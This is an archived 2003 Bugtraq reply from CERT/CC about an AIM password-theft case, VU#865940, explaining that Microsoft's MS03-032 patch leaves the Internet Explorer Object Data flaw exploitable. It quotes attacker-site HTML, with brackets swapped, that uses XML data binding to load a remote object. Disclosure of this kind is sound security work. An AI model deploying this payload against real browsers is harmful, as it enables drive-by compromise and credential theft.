[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <200309241840.h8OIeZR06977@watson.blue.cert.org>
Date: Wed, 24 Sep 2003 14:35:06 -0400
From: "CERT(R) Coordination Center" <cert@...t.org>
To: "Thor Larholm" <thor@...x.com>
Cc: "CERT(R) Coordination Center" <cert@...t.org>,
"Mark Coleman" <markc@...ontown.com>, bugtraq@...urityfocus.org
Subject: RE: [Fwd: Re: AIM Password theft] VU#865940
-----BEGIN PGP SIGNED MESSAGE-----
Thor Larholm <thor@...x.com> writes:
> This is just a simple exploit utilizing the Object Data vulnerability
> discovered by Drew Copley, coupled with the GreyMagic no-script HTML
> rendering as demonstrated earlier on this list and others by jelmer.
>
> Tell your user to go install MS03-032, which he obviously did not do as
> MS03-032 patches this vulnerability. MS03-032 was released on August 20
> and you can find it at
>
> http://www.microsoft.com/technet/security/bulletin/MS03-032.asp
At the present, the patch for MS03-032 breaks one of at least three
exploit techniques. The patch does not resolve the vulnerability.
MS03-032 acknowledges this. I have seen several examples of this
vulnerability being exploited in the wild.
> www.haxr.org contains the following HTML code (with <> replaced to []):
>
> [span datasrc="#oExec" datafld="counter" dataformatas="html"][/span]
> [xml id="oExec"]
> [security]
> [counter]
> [![CDATA[
> [object data=tracker.php][/object]
> ]]]
> [/counter]
> [/security]
> [/xml]
In particular, the current MS03-32 patch doesn't account for an HTML
document created via XML/data binding:
<http://greymagic.com/adv/gm001-ie/>
The patch also does not account for an HTML document created via
script:
<http://www.securityfocus.com/archive/1/336616>
Vulnerability Note VU#865940:
<http://www.kb.cert.org/vuls/id/865940>
Regards,
- Art
Art Manion -- CERT Coordination Center
<http://www.cert.org/> <cert@...t.org> +1 412-268-7090
E0 1E DF F5 FC 76 00 32 77 8F 25 F7 B0 2E 2C 27
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv
iQCVAwUBP3HlHDpmH2w9K/0VAQGBuQQAmrvGlHEXmMx48LhA2dQ/wK8XCqYaVYtD
Y4FPmSvwqZ8phYKhT20Dh9sYGLWHbaJ3sfGA589MOLJwhpZ3aVlunLQ6GjLO1qje
6dab5rVGdgTNzMC87YX2E7RB6uS4K8htL0MhN4LLvbHS402QEeNOhX+Fi2lsLkyi
6uioMggI1Ms=
=Jnmk
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists